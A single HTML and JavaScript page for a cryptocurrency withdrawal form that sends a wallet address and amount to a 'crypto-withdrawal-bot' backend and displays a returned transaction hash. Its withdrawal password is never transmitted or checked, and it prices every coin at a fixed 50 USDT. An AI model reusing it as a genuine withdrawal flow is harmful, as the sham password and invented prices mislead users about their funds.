<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Withdrawal Page</title>
<style>
body { font-family: Arial,sans-serif; background: transparent; color: #fff; margin:0; padding:0;}
.container {max-width:480px;margin:40px auto;background: rgba(0,0,0,0.6); padding:20px; border-radius:12px;}
h2 {text-align:center;margin-bottom:20px;font-size:1.5em;}
label{display:block;margin-top:10px;font-size:14px;}
input,select,button{width:100%;padding:10px;margin:6px 0;border-radius:6px;border:none;font-size:14px;box-sizing:border-box;}
input,select{background: rgba(255,255,255,0.1); color:#fff;}
button{background:#00bfff;color:#fff;cursor:pointer;font-weight:bold;}
button:disabled{background:#555;cursor:not-allowed;}
.balance{font-size:13px;color:#0f0;margin-bottom:10px;text-align:right;}
.fee{font-size:13px;color:#ff0;margin-bottom:5px;}
#txHashDisplay{font-size:14px;margin-top:10px;color:#0ff;white-space: pre-line;}
#copyBtn{display:none;margin-top:5px;padding:5px;font-size:13px;cursor:pointer;border:none;border-radius:5px;background:#00b894;color:#fff;}
.button-row{display:flex;flex-wrap:wrap;gap:10px;margin-top:5px;}
.button-row button{flex:1 1 48%;min-width:100px;}
@media screen and (max-width:480px){.container{width:90%;padding:15px;margin:20px auto;}.button-row button{flex:1 1 100%;}}
</style>
</head>
<body>
<div class="container">
<h2></h2>

<label for="cryptoSelect">Select Cryptocurrency</label>
<select id="cryptoSelect">
<option value="BTCUSDT">BTC</option>
<option value="ETHUSDT">ETH</option>
</select>

<label for="coinAmount">Enter Coin Amount</label>
<input type="number" id="coinAmount" placeholder="Enter coin amount" min="0">
<div class="balance" id="usdtConverted">USDT Equivalent: 0</div>
<div class="fee" id="feeDisplay">Fee 0.1 USDT, Actual Amount: 0</div>

<label for="withdrawPwd">Withdrawal Password</label>
<input type="password" id="withdrawPwd" placeholder="Enter withdrawal password">

<div class="button-row">
<button id="createPwdBtn">Create Password</button>
<button id="confirmPwdBtn">Confirm Password</button>
<button id="forgotPwdBtn">Forgot Password</button>
</div>

<label for="wallet">Wallet Address</label>
<input type="text" id="wallet" placeholder="Enter or bind wallet address">
<div class="button-row">
<button id="bindWalletBtn">Bind Wallet</button>
<button id="editWalletBtn">Modify Wallet</button>
<button id="submitBtn" disabled>Submit Withdrawal</button>
</div>

<div id="txHashDisplay"></div>
<button id="copyBtn">Copy Transaction Hash</button>
</div>

<script>
const API = "https://crypto-withdrawal-bot-production.up.railway.app";
let walletBound=false, pwdCreated=false, currentWallet=null;
const FEE=0.1;
const coinAmount=document.getElementById('coinAmount');
const usdtConverted=document.getElementById('usdtConverted');
const feeDisplay=document.getElementById('feeDisplay');
const submitBtn=document.getElementById('submitBtn');
const walletInput=document.getElementById('wallet');
const bindWalletBtn=document.getElementById('bindWalletBtn');
const editWalletBtn=document.getElementById('editWalletBtn');
const withdrawPwd=document.getElementById('withdrawPwd');
const createPwdBtn=document.getElementById('createPwdBtn');
const confirmPwdBtn=document.getElementById('confirmPwdBtn');
const txHashDisplay=document.getElementById('txHashDisplay');
const copyBtn=document.getElementById('copyBtn');

function maskWallet(addr){return addr.slice(0,3)+'****'+addr.slice(-3);}
function checkSubmitEnable(){
    const qty=parseFloat(coinAmount.value)||0;
    submitBtn.disabled=!(walletBound && pwdCreated && qty>0);
}

async function initWallet(){
    try{
        const res=await fetch(`${API}/api/wallet`);
        const data=await res.json();
        if(data.wallet){
            currentWallet=data.wallet;
            walletInput.value=maskWallet(currentWallet);
            walletInput.disabled=true;
            walletBound=true;
            checkSubmitEnable();
        }
    }catch(err){console.error(err);}
}
initWallet();

coinAmount.addEventListener('input',()=>{
    const qty=parseFloat(coinAmount.value)||0;
    usdtConverted.innerText=`USDT Equivalent: ${qty*50}`;
    feeDisplay.innerText=`Fee ${FEE} USDT, Actual Amount: ${Math.max(qty*50-FEE,0)}`;
    checkSubmitEnable();
});

bindWalletBtn.addEventListener('click', async ()=>{
    if(currentWallet){ alert('Wallet already bound. Use Modify Wallet.'); return; }
    const val = walletInput.value.trim();
    if(!val){ alert('Enter wallet'); return; }
    try{
        const res = await fetch(`${API}/api/wallet`,{
            method:'POST',
            headers:{'Content-Type':'application/json'},
            body: JSON.stringify({ wallet: val })
        });
        const data = await res.json();
        if(data.success){
            currentWallet = data.wallet;
            walletInput.value = maskWallet(currentWallet);
            walletInput.disabled = true;
            walletBound = true;
            alert('Wallet bound successfully');
            checkSubmitEnable();
        } else alert(data.error);
    }catch(err){ alert('Error: '+err.message); }
});

editWalletBtn.addEventListener('click', async ()=>{
    const newWallet = prompt('Enter new wallet address:');
    if(!newWallet) return;
    const oldWallet = currentWallet;
    try{
        const res = await fetch(`${API}/api/wallet`,{
            method:'POST',
            headers:{'Content-Type':'application/json'},
            body: JSON.stringify({ wallet:newWallet, oldWallet })
        });
        const data = await res.json();
        if(data.success){
            currentWallet = data.wallet;
            walletInput.value = maskWallet(currentWallet);
            walletInput.disabled = true;
            walletBound = true;
            alert('Wallet updated successfully');
            checkSubmitEnable();
        } else alert(data.error);
    }catch(err){ alert('Error: '+err.message); }
});

createPwdBtn.addEventListener('click', ()=>{
    const val=withdrawPwd.value.trim();
    if(!val){ alert('Enter password'); return; }
    pwdCreated=true;
    withdrawPwd.disabled=true;
    createPwdBtn.disabled=true;
    checkSubmitEnable();
});

confirmPwdBtn.addEventListener('click', ()=>{
    if(!pwdCreated){ alert('Password not set'); return; }
    alert('Password confirmed');
});

submitBtn.addEventListener('click', async ()=>{
    const qty=parseFloat(coinAmount.value)||0;
    const payload={ coin: document.getElementById('cryptoSelect').value, amount: qty, wallet: currentWallet };
    try{
        const res = await fetch(`${API}/api/withdraw`,{
            method:'POST',
            headers:{'Content-Type':'application/json'},
            body: JSON.stringify(payload)
        });
        const data = await res.json();
        if(data.success){
            txHashDisplay.innerText=`Transaction Hash: ${data.hash}\n⚠️ Screenshot and save.`;
            copyBtn.style.display='block';
            submitBtn.disabled=true;
        } else alert('Failed: '+data.error);
    }catch(err){ alert('Error: '+err.message); }
});

copyBtn.addEventListener('click', ()=>{
    navigator.clipboard.writeText(txHashDisplay.innerText).then(()=>alert('Copied!'));
});
</script>
</body>
</html>
